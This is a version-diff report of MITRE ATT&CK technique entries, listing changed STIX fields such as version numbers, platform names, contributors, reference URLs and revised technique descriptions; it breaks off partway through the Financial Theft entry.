STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-08 10:33:02.083000+00:00 | 2024-09-30 13:28:37.415000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1098.005] Account Manipulation: Device Registration
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-03 17:38:39.065000+00:00 | 2024-09-25 20:39:53.597000+00:00 |
description | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)
Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT) | Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)
Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | SaaS | |
[T1498.001] Network Denial of Service: Direct Network Flood
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:53.685000+00:00 | 2024-10-15 15:54:49.943000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-15 00:25:36.502000+00:00 | 2024-10-16 19:38:57.374000+00:00 |
description | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
[T1562.008] Impair Defenses: Disable or Modify Cloud Logs
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-12 21:13:56.431000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.0 | 2.1 |
x_mitre_platforms[2] | Google Workspace | Office Suite |
x_mitre_platforms[3] | Azure AD | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
[T1556.001] Modify Authentication Process: Domain Controller Authentication
Current version: 2.1
Version changed from: 2.0 → 2.1
New Mitigations:
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-20 20:10:26.613000+00:00 | 2024-08-21 15:26:54.386000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1568.002] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 18:26:23.432000+00:00 | 2024-10-15 15:55:16.111000+00:00 |
external_references[5]['url'] | https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html | https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e |
x_mitre_version | 1.0 | 1.1 |
[T1484] Domain or Tenant Policy Modification
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-19 04:27:31.884000+00:00 | 2024-10-15 15:55:32.946000+00:00 |
external_references[9]['description'] | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019. | Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024. |
external_references[9]['url'] | http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ | https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/ |
x_mitre_version | 3.0 | 3.1 |
x_mitre_platforms[1] | Azure AD | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | SaaS | |
[T1583.001] Acquire Infrastructure: Domains
Current version: 1.4
Version changed from: 1.3 → 1.4
Description diff (old → new): the text is unchanged through "...purchasing domains with different domain registrars.(Citation: Mandiant APT1)"; the new version appends one final paragraph:

In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-28 15:55:55.068000+00:00 | 2024-09-25 15:26:00.047000+00:00 |
description | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024) |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Invictus IR DangerDev 2024', 'description': 'Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.', 'url': 'https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me'} |
[T1584.001] Compromise Infrastructure: Domains
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-07 13:05:42.901000+00:00 | 2024-09-24 15:10:40.270000+00:00 |
description | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1189] Drive-by Compromise
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-14 23:58:45.490000+00:00 | 2024-10-15 15:55:47.494000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | SaaS | Identity Provider |
[T1087.003] Account Discovery: Email Account
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-03-31 13:10:46.302000+00:00 | 2024-10-17 20:35:35.125000+00:00 |
description | Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) | Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Google Workspace | |
[T1114] Email Collection
Current version: 2.6
Version changed from: 2.5 → 2.6
New Mitigations:
- M1060: Out-of-Band Communications Channel
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-09-29 21:06:03.098000+00:00 | 2024-10-15 12:24:27.627000+00:00 |
description | Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. | Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients. |
x_mitre_version | 2.5 | 2.6 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'CISA AA20-352A 2021', 'description': 'CISA. (2021, April 15). Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. Retrieved August 30, 2024.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a'} |
external_references | | {'source_name': 'TrustedSec OOB Communications', 'description': 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response. Retrieved August 30, 2024.', 'url': 'https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response'} |
x_mitre_contributors | | Menachem Goldstein |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1114.003] Email Collection: Email Forwarding Rule
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
- M1060: Out-of-Band Communications Channel
New Detections:
- DS0025: Cloud Service (Cloud Service Metadata)
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-12 20:47:47.583000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Cloud Service: Cloud Service Metadata |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1564.008] Hide Artifacts: Email Hiding Rules
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-16 16:41:53.957000+00:00 | 2024-10-15 15:56:27.592000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1499] Endpoint Denial of Service
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-30 21:01:44.038000+00:00 | 2024-10-15 15:56:47.424000+00:00 |
external_references[2]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved September 23, 2024. |
external_references[2]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1546] Event Triggered Execution
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-03-01 15:49:15.588000+00:00 | 2024-10-15 15:57:00.731000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[5] | Office 365 | Office Suite |
[T1480] Execution Guardrails
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-05-03 02:39:29.314000+00:00 | 2024-06-07 14:30:23.491000+00:00 |
description | Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. | Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Trellix-Qakbot', 'description': 'Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved June 7, 2024.', 'url': 'https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/'} |
[T1048] Exfiltration Over Alternative Protocol
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_network_requirements | False | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-15 00:58:36.287000+00:00 | 2024-10-15 15:57:26.415000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[6] | Google Workspace | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Office 365 | |
[T1567] Exfiltration Over Web Service
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-09-05 15:00:36.471000+00:00 | 2024-10-15 15:57:40.951000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-12 05:22:59.079000+00:00 | 2024-10-15 15:57:55.928000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[4] | Office 365 | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Google Workspace | |
[T1190] Exploit Public-Facing Application
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-11-28 21:27:35.373000+00:00 | 2024-09-24 14:33:53.433000+00:00 |
description | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
x_mitre_version | 2.5 | 2.6 |
[T1212] Exploitation for Credential Access
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-15 11:45:21.555000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
external_references[5]['description'] | Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023. | Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 12, 2024. |
external_references[5]['url'] | https://twitter.com/MsftSecIntel/status/1671579359994343425 | https://x.com/MsftSecIntel/status/1671579359994343425 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Azure AD | Identity Provider |
[T1657] Financial Theft
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
